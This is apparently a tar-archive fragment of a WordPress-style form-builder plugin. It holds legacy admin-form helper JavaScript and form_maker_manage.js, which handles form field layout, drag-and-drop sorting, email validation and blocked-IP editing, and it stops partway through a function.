}

function isChecked(isitchecked){
	if (isitchecked == true){
		document.adminForm.boxchecked.value++;
	}
	else {
		document.adminForm.boxchecked.value--;
	}
}

/**
* Default function.  Usually would be overriden by the component
*//*
function submitbutton(pressbutton) {
	submitform(pressbutton);
}
*/
/**
* Submit the admin form
*/
function submitform(pressbutton){
	if (pressbutton) {
		document.adminForm.task.value=pressbutton;
	}
	if (typeof document.adminForm.onsubmit == "function") {
		document.adminForm.onsubmit();
	}
	document.adminForm.submit();
}

/**
* Submit the control panel admin form
*/
function submitcpform(sectionid, id){
	document.adminForm.sectionid.value=sectionid;
	document.adminForm.id.value=id;
	submitbutton("edit");
}

/**
* Getting radio button that is selected.
*/
function getSelected(allbuttons){
	for (i=0;i<allbuttons.length;i++) {
		if (allbuttons[i].checked) {
			return allbuttons[i].value
		}
	}
	return null;
}

// JS Calendar
var calendar = null; // remember the calendar object so that we reuse
// it and avoid WD_FMC_URL another

// This function gets called when an end-user clicks on some date
function selected(cal, date) {
	cal.sel.value = date; // just update the value of the input field
}

// And this gets called when the end-user clicks on the _selected_ date,
// or clicks the "Close" (X) button.  It just hides the calendar without
// destroying it.
function closeHandler(cal) {
	cal.hide();			// hide the calendar

	// don't check mousedown on document anymore (used to be able to hide the
	// calendar when someone clicks outside it, see the showCalendar function).
	Calendar.removeEvent(document, "mousedown", checkCalendar);
}

// This gets called when the user presses a mouse button anywhere in the
// document, if the calendar is shown.  If the click was outside the open
// calendar this function closes it.
function checkCalendar(ev) {
	var el = Calendar.is_ie ? Calendar.getElement(ev) : Calendar.getTargetElement(ev);
	for (; el != null; el = el.parentNode)
	// FIXME: allow end-user to click some link without closing the
	// calendar.  Good to see real-time stylesheet change :)
	if (el == calendar.element || el.tagName == "A") break;
	if (el == null) {
		// calls closeHandler which should hide the calendar.
		calendar.callCloseHandler(); Calendar.stopEvent(ev);
	}
}

// This function shows the calendar under the element having the given id.
// It takes care of catching "mousedown" signals on document and hiding the
// calendar if the click was outside.
function showCalendar(id, dateFormat, dis_past_days) {
	var el = document.getElementById(id);
	if (calendar != null) {
		// we already have one created, so just update it.
		calendar.hide();		// hide the existing calendar
		calendar.parseDate(el.value); // set it to a new date
		if(dis_past_days)
			calendar.getDateStatus = getDisabledDates; // disable past days
		else
			calendar.getDateStatus = null; // disable past days
		calendar.refresh();
	} else {
		// first-time call, create the calendar
		var cal = new Calendar(true, null, selected, closeHandler);
		calendar = cal;		// remember the calendar in the global
		cal.setRange(1900, 2070);	// min/max year allowed

		if ( dateFormat )	// optional date format
		{
			cal.setDateFormat(dateFormat);
		}
		if(dis_past_days)
			cal.getDateStatus = getDisabledDates; // disable past days
		calendar.create();		// create a popup calendar
		calendar.parseDate(el.value); // set it to a new date
	}
	calendar.sel = el;		// inform it about the input field in use
	calendar.showAtElement(el);	// show the calendar next to the input field

	// catch mousedown on the document
	Calendar.addEvent(document, "mousedown", checkCalendar);
	return false;
}

function getDisabledDates(date) {
	var currentDate = new Date();
	if( date.getDate() == currentDate.getDate() && date.getMonth() == currentDate.getMonth() && date.getFullYear() == currentDate.getFullYear() )
		return 'today';
	
	if( date.getTime() < currentDate.getTime() )
		return true;
}

/**
* Pops up a new window in the middle of the screen
*/
function popupWindow(mypage, myname, w, h, scroll) {
	var winl = (screen.width - w) / 2;
	var wint = (screen.height - h) / 2;
	winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
	win = window.open(mypage, myname, winprops)
	if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
}

// LTrim(string) : Returns a copy of a string without leading spaces.
function ltrim(str)
{
   var whitespace = new String(" \t\n\r");
   var s = new String(str);
   if (whitespace.indexOf(s.charAt(0)) != -1) {
      var j=0, i = s.length;
      while (j < i && whitespace.indexOf(s.charAt(j)) != -1)
         j++;
      s = s.substring(j, i);
   }
   return s;
}

//RTrim(string) : Returns a copy of a string without trailing spaces.
function rtrim(str)
{
   var whitespace = new String(" \t\n\r");
   var s = new String(str);
   if (whitespace.indexOf(s.charAt(s.length-1)) != -1) {
      var i = s.length - 1;       // Get length of string
      while (i >= 0 && whitespace.indexOf(s.charAt(i)) != -1)
         i--;
      s = s.substring(0, i+1);
   }
   return s;
}

// Trim(string) : Returns a copy of a string without leading or trailing spaces
function trim(str) {
   return rtrim(ltrim(str));
}

function mosDHTML(){
	this.ver=navigator.appVersion
	this.agent=navigator.userAgent
	this.dom=document.getElementById?1:0
	this.opera5=this.agent.indexOf("Opera 5")<-1
	this.ie5=(this.ver.indexOf("MSIE 5")<-1 && this.dom && !this.opera5)?1:0;
	this.ie6=(this.ver.indexOf("MSIE 6")<-1 && this.dom && !this.opera5)?1:0;
	this.ie4=(document.all && !this.dom && !this.opera5)?1:0;
	this.ie=this.ie4||this.ie5||this.ie6
	this.mac=this.agent.indexOf("Mac")<-1
	this.ns6=(this.dom && parseInt(this.ver) <= 5) ?1:0;
	this.ns4=(document.layers && !this.dom)?1:0;
	this.bw=(this.ie6||this.ie5||this.ie4||this.ns4||this.ns6||this.opera5);

	this.activeTab = '';
	this.onTabStyle = 'ontab';
	this.offTabStyle = 'offtab';

	this.setElemStyle = function(elem,style) {
		document.getElementById(elem).className = style;
	}
	this.showElem = function(id) {
		if ((elem = document.getElementById(id))) {
			elem.style.visibility = 'visible';
			elem.style.display = 'block';
		}
	}
	this.hideElem = function(id) {
		if ((elem = document.getElementById(id))) {
			elem.style.visibility = 'hidden';
			elem.style.display = 'none';
		}
	}
	this.cycleTab = function(name) {
		if (this.activeTab) {
			this.setElemStyle( this.activeTab, this.offTabStyle );
			page = this.activeTab.replace( 'tab', 'page' );
			this.hideElem(page);
		}
		this.setElemStyle( name, this.onTabStyle );
		this.activeTab = name;
		page = this.activeTab.replace( 'tab', 'page' );
		this.showElem(page);
	}
	return this;
}
var dhtml = new mosDHTML();

// needed for Table Column ordering
function tableOrdering( order, dir, task ) {
	var form = document.adminForm;

	form.filter_order.value 	= order;
	form.filter_order_Dir.value	= dir;
	submitform( task );
}

function saveorder( n,  task ) {
	checkAll_button( n, task );
}

//needed by saveorder function
function checkAll_button( n, task ) {

    if (!task ) {
		task = 'saveorder';
	}

	for ( var j = 0; j <= n; j++ ) {
		box = eval( "document.adminForm.cb" + j );
		if ( box ) {
			if ( box.checked == false ) {
				box.checked = true;
			}
		} else {
			alert("You cannot change the order of items, as an item in the list is `Checked Out`");
			return;
		}
	}
	submitform(task);
}
/**
* @param object A form element
* @param string The name of the element to find
*/
function getElementByName( f, name ) {
	if (f.elements) {
		for (i=0, n=f.elements.length; i < n; i++) {
			if (f.elements[i].name == name) {
				return f.elements[i];
			}
		}
	}
	return null;
}

function go2( pressbutton, menu, id ) {
	var form = document.adminForm;

	if (form.imagelist && form.images) {
		// assemble the images back into one field
		var temp = new Array;
		for (var i=0, n=form.imagelist.options.length; i < n; i++) {
			temp[i] = form.imagelist.options[i].value;
		}
		form.images.value = temp.join( '\n' );
	}

	if (pressbutton == 'go2menu') {
		form.menu.value = menu;
		submitform( pressbutton );
		return;
	}

	if (pressbutton == 'go2menuitem') {
		form.menu.value 	= menu;
		form.menuid.value 	= id;
		submitform( pressbutton );
		return;
	}
}
/**
 * Verifies if the string is in a valid email format
 * @param	string
 * @return	boolean
 */
function isEmail( text )
{
	var pattern = "^[\\w-_\.]*[\\w-_\.]\@[\\w]\.+[\\w]+[\\w]$";
	var regex = new RegExp( pattern );
	return regex.test( text );
}js/form_maker_manage.js000060400000140777152434416630011174 0ustar00function fm_check_page_load() {
  if (!document.getElementById('araqel') || (document.getElementById('araqel').value == '0')) {
    alert('Please wait while page is loading.');
    return false;
  }
  else {
    return true;
  }
}

function remove_whitespace(node) {
  var ttt;
  for (ttt = 0; ttt < node.childNodes.length; ttt++) {
    if (node.childNodes[ttt] && node.childNodes[ttt].nodeType == '3' && !/\S/.test(node.childNodes[ttt].nodeValue)) {
      node.removeChild(node.childNodes[ttt]);
      ttt--;
    }
    else {
      if (node.childNodes[ttt].childNodes.length) {
        remove_whitespace(node.childNodes[ttt]);
      }
    }
  }
  return;
}

function remove_empty_columns() {
	jQuery('.wdform_section').each(function() {
		if(jQuery(this).find('.wdform_column').last().prev().html()=='') {
			if(jQuery(this).children().length>2) {
				jQuery(this).find('.wdform_column').last().prev().remove();
				remove_empty_columns();
			}
		}	
	});
}


function sortable_columns() {
  jQuery( ".wdform_column" ).sortable({
		connectWith: ".wdform_column",
		cursor: 'move',
		placeholder: "highlight",
		start: function(e,ui){
			jQuery('.wdform_column').each(function() {
				if(jQuery(this).html()) {
					jQuery(this).append(jQuery('<div class="wdform_empty_row" style="height:80px;"></div>'));
					jQuery( ".wdform_column" ).sortable( "refresh" );
				}
			});			
		},
		update: function(event, ui) {
			jQuery('.wdform_section .wdform_column:last-child').each(function() {
				if(jQuery(this).html()) {
					jQuery(this).parent().append(jQuery('<div></div>').addClass("wdform_column"));	
					sortable_columns();
				}		
			});
		},
		stop: function(event, ui) {
			jQuery('.wdform_empty_row').remove();	
			remove_empty_columns();	
		}
  });
}

function all_sortable_events()
{
	jQuery(document).on( "click", ".wdform_row, .wdform_tr_section_break", function() {
		var this2=this; 
		setTimeout( function(){		
			if(jQuery("#wdform_arrows"+jQuery(this2).attr("wdid")).attr("class")=="wdform_arrows_show") {
				jQuery("#wdform_field"+jQuery(this2).attr("wdid")).css({"background-color":"#fff", "border":"none", "margin-top":""});
				jQuery("#wdform_arrows"+jQuery(this2).attr("wdid")).removeClass("wdform_arrows_show");
				jQuery("#wdform_arrows"+jQuery(this2).attr("wdid")).addClass("wdform_arrows");
				jQuery("#wdform_arrows"+jQuery(this2).attr("wdid")).hide();
			}
		else {
			jQuery(".wdform_arrows_show").addClass("wdform_arrows");
			jQuery(".wdform_arrows").hide();
			jQuery(".wdform_arrows_show").removeClass("wdform_arrows_show");
			jQuery(".wdform_field, .wdform_field_section_break").css("background-color","#fff");
			jQuery(".wdform_field").css("margin-top","");
			
			if(jQuery("#wdform_field"+jQuery(this2).attr("wdid")).attr("type")=='type_editor')
				jQuery("#wdform_field"+jQuery(this2).attr("wdid")).css("margin-top","-5px");
			
			jQuery("#wdform_field"+jQuery(this2).attr("wdid")).css({"background-color":"#fff"});
			jQuery("#wdform_field"+jQuery(this2).attr("wdid")).css({"border":"none"});
			jQuery("#wdform_arrows"+jQuery(this2).attr("wdid")).removeClass("wdform_arrows");
			jQuery("#wdform_arrows"+jQuery(this2).attr("wdid")).addClass("wdform_arrows_show");
			jQuery("#wdform_arrows"+jQuery(this2).attr("wdid")).show();
		}

	},300)});

	jQuery(document).on( "hover", ".wdform_tr_section_break", function() {
		jQuery("#wdform_field"+jQuery(this).attr("wdid")).css({"background-color":"#F5F5F5"});
	});

	jQuery(document).on( "hover", ".wdform_row", function() {
		jQuery("#wdform_field"+jQuery(this).attr("wdid")).css({"cursor":"move","background-color":"#F5F5F5"});
	});

	jQuery(document).on( "mouseleave", ".wdform_row, .wdform_tr_section_break", function() {
		jQuery("#wdform_field"+jQuery(this).attr("wdid")).css({"background-color":"#fff", "border":"none"});
		if(jQuery("#wdform_arrows"+jQuery(this).attr("wdid")).attr("class")!="wdform_arrows_show") {
			jQuery("#wdform_arrows"+jQuery(this).attr("wdid")).addClass("wdform_arrows");
		}
	});
}

jQuery(document).on( "dblclick", ".wdform_row, .wdform_tr_section_break", function() {
		edit(jQuery(this).attr("wdid"));
});
	
	
function fm_change_radio(elem) {	
	if(jQuery( elem ).hasClass( "fm-yes" )) {
		jQuery( elem ).val('0');
		jQuery( elem ).next().val('0');
		jQuery( elem ).removeClass('fm-yes').addClass('fm-no');
		jQuery(elem).find("span").animate({
			right: parseInt(jQuery( elem ).css( "width")) - 14 + 'px'
		}, 400, function() {
		}); 
	}	
	else {
		jQuery( elem ).val('1');
		jQuery( elem ).next().val('1');
		jQuery(elem).find("span").animate({
			right: 0
		}, 400, function() {
			jQuery( elem ).removeClass('fm-no').addClass('fm-yes');
		}); 
	}	
	if(jQuery( elem ).next().attr('name') == 'mail_verify') {
		show_verify_options(jQuery( elem ).val() == 1 ? true : false);
	}	
}
		
function enable_drag(elem) {
	if(jQuery('#enable_sortable').val() != 1) {
		jQuery('.wdform_column').sortable( "enable" );
		jQuery( ".wdform_arrows" ).slideUp(700);
		all_sortable_events();
	}
	else {
		jQuery('.wdform_column').sortable( "disable" );	
		jQuery(".wdform_column").css("border","none");		
		jQuery( ".wdform_row, .wdform_tr_section_break" ).die("click");
		jQuery( ".wdform_row" ).die("hover");
		jQuery( ".wdform_tr_section_break" ).die("hover");
		jQuery( ".wdform_field" ).css("cursor","default");
		jQuery( ".wdform_field, .wdform_field_section_break" ).css("background-color","#fff");
		jQuery( ".wdform_field, .wdform_field_section_break" ).css("border","none");
		jQuery( ".wdform_arrows_show" ).hide();
		jQuery( ".wdform_arrows_show" ).addClass("wdform_arrows");
		jQuery( ".wdform_arrows_show" ).removeClass("wdform_arrows_show");
		jQuery( ".wdform_arrows" ).slideDown(600);	
	}
	
	fm_change_radio(elem);
}

function refresh_() {
	document.getElementById('counter').value = gen;
	for (i = 1; i <= form_view_max; i++) {
		if (document.getElementById('form_id_tempform_view' + i)) {
			if (document.getElementById('page_next_' + i)) {
				document.getElementById('page_next_' + i).removeAttribute('src');
      }
			if (document.getElementById('page_previous_' + i)) {
				document.getElementById('page_previous_' + i).removeAttribute('src');
      }
			document.getElementById('form_id_tempform_view' + i).parentNode.removeChild(document.getElementById('form_id_tempform_view_img' + i));
			document.getElementById('form_id_tempform_view' + i).removeAttribute('style');
		}
  }
	document.getElementById('form_front').value = document.getElementById('take').innerHTML;
}

function refresh_old() {
  document.getElementById('form').value = document.getElementById('take').innerHTML;
  document.getElementById('counter').value = gen;
  n = gen;
  for (i = 0; i < n; i++) {
    if (document.getElementById(i)) {
      for (z = 0; z < document.getElementById(i).childNodes.length; z++) {
        if (document.getElementById(i).childNodes[z].nodeType == 3) {
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[z]);
        }
      }
      if (document.getElementById(i).getAttribute('type') == "type_captcha" || document.getElementById(i).getAttribute('type') == "type_recaptcha") {
        if (document.getElementById(i).childNodes[10]) {
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
        }
        else {
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
          document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
        }
        continue;
      }

      if (document.getElementById(i).getAttribute('type') == "type_section_break") {
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
        continue;
      }

      if (document.getElementById(i).childNodes[10]) {
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
      }
      else {
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
        document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
      }
    }
  }

  for (i = 0; i <= n; i++) {
    if (document.getElementById(i)) {
      type = document.getElementById(i).getAttribute("type");
      switch (type) {
        case "type_text":
        case "type_number":
        case "type_password":
        case "type_submitter_mail":
        case "type_own_select":
        case "type_country":
        case "type_hidden":
        case "type_map":
        case "type_mark_map":
        case "type_paypal_select": {
          remove_add_(i + "_elementform_id_temp");
          break;
        }
        case "type_submit_reset": {
          remove_add_(i + "_element_submitform_id_temp");
          if (document.getElementById(i + "_element_resetform_id_temp"))
            remove_add_(i + "_element_resetform_id_temp");
          break;
        }
        case "type_captcha": {
          remove_add_("_wd_captchaform_id_temp");
          remove_add_("_element_refreshform_id_temp");
          remove_add_("_wd_captcha_inputform_id_temp");
          break;
        }
        case "type_recaptcha": {
          document.getElementById("public_key").value = document.getElementById("wd_recaptchaform_id_temp").getAttribute("public_key");
          document.getElementById("private_key").value = document.getElementById("wd_recaptchaform_id_temp").getAttribute("private_key");
          document.getElementById("recaptcha_theme").value = document.getElementById("wd_recaptchaform_id_temp").getAttribute("theme");
          document.getElementById('wd_recaptchaform_id_temp').innerHTML = '';
          remove_add_("wd_recaptchaform_id_temp");
          break;
        }
        case "type_file_upload": {
          remove_add_(i + "_elementform_id_temp");
          break;
        }
        case "type_textarea": {
          remove_add_(i + "_elementform_id_temp");
          break;
        }
        case "type_name": {
          if (document.getElementById(i + "_element_titleform_id_temp")) {
            remove_add_(i + "_element_titleform_id_temp");
            remove_add_(i + "_element_firstform_id_temp");
            remove_add_(i + "_element_lastform_id_temp");
            remove_add_(i + "_element_middleform_id_temp");
          }
          else {
            remove_add_(i + "_element_firstform_id_temp");
            remove_add_(i + "_element_lastform_id_temp");
          }
          break;
        }
        case "type_phone": {
          remove_add_(i + "_element_firstform_id_temp");
          remove_add_(i + "_element_lastform_id_temp");
          break;
        }
        case "type_paypal_price": {
          remove_add_(i + "_element_dollarsform_id_temp");
          remove_add_(i + "_element_centsform_id_temp");
          break;
        }
        case "type_address": {
          if (document.getElementById(id_for_country+"_disable_fieldsform_id_temp")) {
            if (document.getElementById(id_for_country+"_disable_fieldsform_id_temp").getAttribute('street1') == 'no') {
              remove_add_(i+"_street1form_id_temp");
            }
            if (document.getElementById(id_for_country+"_disable_fieldsform_id_temp").getAttribute('street2') == 'no')	{
              remove_add_(i+"_street2form_id_temp");
            }
            if (document.getElementById(id_for_country+"_disable_fieldsform_id_temp").getAttribute('city') == 'no') {
              remove_add_(i+"_cityform_id_temp");
            }
            if (document.getElementById(id_for_country+"_disable_fieldsform_id_temp").getAttribute('state') == 'no') {
              remove_add_(i+"_stateform_id_temp");
            }
            if (document.getElementById(id_for_country+"_disable_fieldsform_id_temp").getAttribute('postal') == 'no') {
              remove_add_(i+"_postalform_id_temp");
            }
            if (document.getElementById(id_for_country+"_disable_fieldsform_id_temp").getAttribute('country') == 'no') {
              remove_add_(i+"_countryform_id_temp");
            }
          }
          break;
        }
        case "type_checkbox":
        case "type_radio":
        case "type_paypal_checkbox":
        case "type_paypal_radio":
        case "type_paypal_shipping": {
          is = true;
          for (j = 0; j < 100; j++) {
            if (document.getElementById(i + "_elementform_id_temp" + j)) {
              remove_add_(i + "_elementform_id_temp" + j);
            }
          }
          break;
        }
        case "type_star_rating": {
          remove_add_(i+"_elementform_id_temp");
          break;
        }
        case "type_scale_rating": {
          remove_add_(i+"_elementform_id_temp");
          break;
        }
        case "type_spinner": {
          remove_add_(i+"_elementform_id_temp");
          break;
        }
        case "type_slider": {
          remove_add_(i+"_elementform_id_temp");
          break;
        }
        case "type_range": {
          remove_add_(i+"_elementform_id_temp0");
          remove_add_(i+"_elementform_id_temp1");
          break;
        }
        case "type_grading": {
          for (k = 0; k < 100; k++) {
            if (document.getElementById(i+"_elementform_id_temp"+k)) {
              remove_add_(i+"_elementform_id_temp"+k);
            }
          }
          break;
        }
        case "type_matrix": {
          remove_add_(i+"_elementform_id_temp");
          break;
        }
        case "type_button": {
          for (j = 0; j < 100; j++) {
            if (document.getElementById(i + "_elementform_id_temp" + j)) {
              remove_add_(i + "_elementform_id_temp" + j);
            }
          }
          break;
        }
        case "type_time": {
          if (document.getElementById(i + "_ssform_id_temp")) {
            remove_add_(i + "_ssform_id_temp");
            remove_add_(i + "_mmform_id_temp");
            remove_add_(i + "_hhform_id_temp");
          }
          else {
            remove_add_(i + "_mmform_id_temp");
            remove_add_(i + "_hhform_id_temp");
          }
          break;
        }
        case "type_date": {
          remove_add_(i + "_elementform_id_temp");
          remove_add_(i + "_buttonform_id_temp");
          break;
        }
        case "type_date_fields": {
          remove_add_(i + "_dayform_id_temp");
          remove_add_(i + "_monthform_id_temp");
          remove_add_(i + "_yearform_id_temp");
          break;
        }
      }
    }
  }

  for (i = 1; i <= form_view_max; i++) {
    if (document.getElementById('form_id_tempform_view' + i)) {
      if (document.getElementById('page_next_' + i)) {
        document.getElementById('page_next_' + i).removeAttribute('src');
      }
      if (document.getElementById('page_previous_' + i)) {
        document.getElementById('page_previous_' + i).removeAttribute('src');
      }
      document.getElementById('form_id_tempform_view' + i).parentNode.removeChild(document.getElementById('form_id_tempform_view_img' + i));
      document.getElementById('form_id_tempform_view' + i).removeAttribute('style');
    }
  }

  for (t = 1; t <= form_view_max; t++) {
    if (document.getElementById('form_id_tempform_view' + t)) {
      form_view_element = document.getElementById('form_id_tempform_view' + t);
      remove_whitespace(form_view_element);
      n = form_view_element.childNodes.length - 2;
      for (q = 0; q <= n; q++) {
        if (form_view_element.childNodes[q]) {
          if (form_view_element.childNodes[q].nodeType != 3) {
            if (!form_view_element.childNodes[q].id) {
              del = true;
              GLOBAL_tr = form_view_element.childNodes[q];
              for (x = 0; x < GLOBAL_tr.firstChild.childNodes.length; x++) {
                table = GLOBAL_tr.firstChild.childNodes[x];
                tbody = table.firstChild;
                if (tbody.childNodes.length) {
                  del = false;
                }
              }
              if (del) {
                form_view_element.removeChild(form_view_element.childNodes[q]);
              }
            }
          }
        }
      }
    }
  }
  document.getElementById('form_front').value = document.getElementById('take').innerHTML;
}


function cfm_create_input(toAdd_id, value_id, parent_id, cfm_url) {
  var value = jQuery("#" + value_id).val();
  if (value) {
    jQuery("#" + value_id).attr("style", "width: 250px;");
    var mail_div = jQuery("<div>").attr("class", "fm_mail_div").prependTo("#" + parent_id).text(value);
    jQuery("<img>").attr("src", cfm_url + "/images/delete.png").attr("class", "fm_delete_img").attr("onclick", "fm_delete_mail(this, '" + value + "')").attr("title", "Delete Email").appendTo(mail_div);
    jQuery("#" + value_id).val("");
    jQuery("#" + toAdd_id).val(jQuery("#" + toAdd_id).val() + value + ",");
  }
}

function fm_delete_mail(img, value) {
  jQuery(img).parent().remove();
  jQuery("#mail").val(jQuery("#mail").val().replace(value + ',', ''));
}

function form_maker_options_tabs(id) {
  if (fm_check_email('mailToAdd') || fm_check_email('from_mail') || fm_check_email('reply_to') || fm_check_email('mail_from_user') || fm_check_email('reply_to_user') || fm_check_email('mail_from_other') || fm_check_email('reply_to_other') || fm_check_email('paypal_email')) {
    return false;
  }
  jQuery("#fieldset_id").val(id);
  jQuery(".fm_fieldset_active").removeClass("fm_fieldset_active").addClass("fm_fieldset_deactive");
  jQuery("#" + id + "_fieldset").removeClass("fm_fieldset_deactive").addClass("fm_fieldset_active");
  jQuery(".fm_fieldset_tab").removeClass("active");
  jQuery("#" + id).addClass("active");
  return false;
}

function codemirror_for_javascript() {
  var editor = CodeMirror.fromTextArea(document.getElementById("form_javascript"), {
  lineNumbers: true,
  lineWrapping: true,
  mode: "javascript"
  });
  
  CodeMirror.commands["selectAll"](editor);
  editor.autoFormatRange(editor.getCursor(true), editor.getCursor(false));
  editor.scrollTo(0,0);
}

function set_type(type) {
  switch(type) {
    case 'post':
    document.getElementById('post').removeAttribute('style');
    document.getElementById('page').setAttribute('style','display:none');
    document.getElementById('custom_text').setAttribute('style','display:none');
    document.getElementById('url').setAttribute('style','display:none');
    document.getElementById('none').setAttribute('style','display:none');
    break;
    case 'page':
      document.getElementById('page').removeAttribute('style');
      document.getElementById('post').setAttribute('style','display:none');
      document.getElementById('custom_text').setAttribute('style','display:none');
      document.getElementById('url').setAttribute('style','display:none');
      document.getElementById('none').setAttribute('style','display:none');
      break;
    case 'custom_text':
      document.getElementById('page').setAttribute('style','display:none');
      document.getElementById('post').setAttribute('style','display:none');
      document.getElementById('custom_text').removeAttribute('style');
      document.getElementById('url').setAttribute('style','display:none');
      document.getElementById('none').setAttribute('style','display:none');
      break;
    case 'url':
      document.getElementById('page').setAttribute('style','display:none');
      document.getElementById('post').setAttribute('style','display:none');
      document.getElementById('custom_text').setAttribute('style','display:none');
      document.getElementById('url').removeAttribute('style');
      document.getElementById('none').setAttribute('style','display:none');
      break;
    case 'none':
      document.getElementById('page').setAttribute('style','display:none');
      document.getElementById('post').setAttribute('style','display:none');
      document.getElementById('custom_text').setAttribute('style','display:none');
      document.getElementById('url').setAttribute('style','display:none');
      document.getElementById('none').removeAttribute('style');
      break;
  }
}

function insertAtCursor(myField, myValue) {
  if (myField.style.display == "none") {
    tinyMCE.execCommand('mceInsertContent', false, "%" + myValue + "%");
    return;
  }
  if (document.selection) {
    myField.focus();
    sel = document.selection.createRange();
    sel.text = myValue;
  }
  else if (myField.selectionStart || myField.selectionStart == '0') {
    var startPos = myField.selectionStart;
    var endPos = myField.selectionEnd;
    myField.value = myField.value.substring(0, startPos)
      + "%" + myValue + "%"
      + myField.value.substring(endPos, myField.value.length);
  }
  else {
    myField.value += "%" + myValue + "%";
  }
}

function check_isnum(e) {
  var chCode1 = e.which || e.keyCode;
  if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57)) {
    return false;
  }
  return true;
}

// Check Email.
function fm_check_email(id) {
  if (document.getElementById(id) && jQuery('#' + id).val() != '') {
    var email_array = jQuery('#' + id).val().split(',');
    for (var email_id = 0; email_id < email_array.length; email_id++) {
      var email = email_array[email_id].replace(/^\s+|\s+$/g, '');
      if (email.search(/^\w+((-\w+)|(\.\w+))*\@[A-Za-z0-9]+((\.|-)[A-Za-z0-9]+)*\.[A-Za-z0-9]+$/) == -1) {
        alert('This is not a valid email address.');
        jQuery('#' + id).css('border', '1px solid #FF0000');
        jQuery('#' + id).focus();
        jQuery('html, body').animate({
          scrollTop:jQuery('#' + id).offset().top - 200
        }, 500);
        return true;
      }
    }
  }
  return false;
}

function fm_edit_ip(id) {
	var ip = jQuery("#ip" + id).html();
	jQuery("#td_ip_" + id).html('<input id="ip' + id + '" class="input_th' + id + '" type="text" onkeypress="return fm_check_isnum(event)" value="' + ip + '" name="ip' + id + '" />');
	jQuery("#td_edit_" + id).html('<button class="fm-icon add-block-ip-icon" onclick="if (fm_check_required(\'ip' + id + '\', \'IP\')) {return false;} fm_set_input_value(\'task\', \'save\'); fm_set_input_value(\'current_id\', ' + id + '); fm_save_ip(' + id + '); return false;"></button>');
}

function fm_save_ip(id) {
	var ip = jQuery("#ip" + id).val();
	var post_data = {};
	post_data["ip"] = ip;
	post_data["current_id"] = id;
	post_data["task"] = "save";

	jQuery.post(jQuery("#blocked_ips").attr("action"), post_data, function (data) {
			jQuery("#td_ip_" + id).html('<a id="ip' + id + '" class="pointer" title="Edit" onclick="fm_edit_ip(' + id + ')">' + ip + '</a>');
			jQuery("#td_edit_" + id).html('<button class="fm-icon edit-icon" onclick="fm_edit_ip(' + id + ');"></button>');
		}	
	).success(function (data, textStatus, errorThrown) {
		jQuery(".update, .error").hide();
		jQuery("#fm_blocked_ips_message").html("<div class='updated'><strong><p>Items Succesfully Saved.</p></strong></div>");
		jQuery("#fm_blocked_ips_message").show();
	});
}

function wdhide(id) {
	document.getElementById(id).style.display = "none";
}
function wdshow(id) {
	document.getElementById(id).style.display = "block";
}
function delete_field_condition(id) {
	var cond_id = id.split("_");
	document.getElementById("condition"+cond_id[0]).removeChild(document.getElementById("condition_div"+id));
}

function change_choices(value, ids, types, params) {
	value = value.split("_");
	global_index = value[0];
	id = value[1];
	index = value[2];
	ids_array = ids.split("@@**@@");
	types_array = types.split("@@**@@");
	params_array = params.split("@@**@@");

	switch(types_array[id]) {
		case "type_text":
		case "type_password":
		case "type_textarea":
		case "type_name":
		case "type_submitter_mail":
		case "type_number":
		case "type_phone":
		case "type_paypal_price":
		case "type_spinner":
			if(types_array[id]=="type_number" || types_array[id]=="type_phone")
				var keypress_function = "return check_isnum_space(event)";
			else
				if(types_array[id]=="type_paypal_price")
					var keypress_function = "return check_isnum_point(event)";
				else
					var keypress_function = "";
		
			if(document.getElementById("field_value"+global_index+"_"+index).tagName=="SELECT") {
				document.getElementById("condition_div"+global_index+"_"+index).removeChild(document.getElementById("field_value"+global_index+"_"+index));				
				var label_input = document.createElement('input');
					label_input.setAttribute("id", "field_value"+global_index+'_'+index);
					label_input.setAttribute("type", "text");
					label_input.setAttribute("value", "");	
